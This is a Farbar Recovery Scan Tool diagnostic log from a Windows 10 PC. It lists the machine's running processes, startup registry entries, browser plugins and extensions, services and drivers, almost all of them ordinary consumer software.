Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
Ran by Kym (administrator) on KYM-PC (01-03-2016 22:11:51)
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\WINDOWS\System32\atiesrxx.exe
(Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
(AMD) C:\WINDOWS\System32\atieclxx.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Angus Johnson) D:\Internode\mum.exe
(Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
(Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\WINDOWS\System32\InstallAgent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S2 MBAMService; D:\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
U3 idsvc; no ImagePath
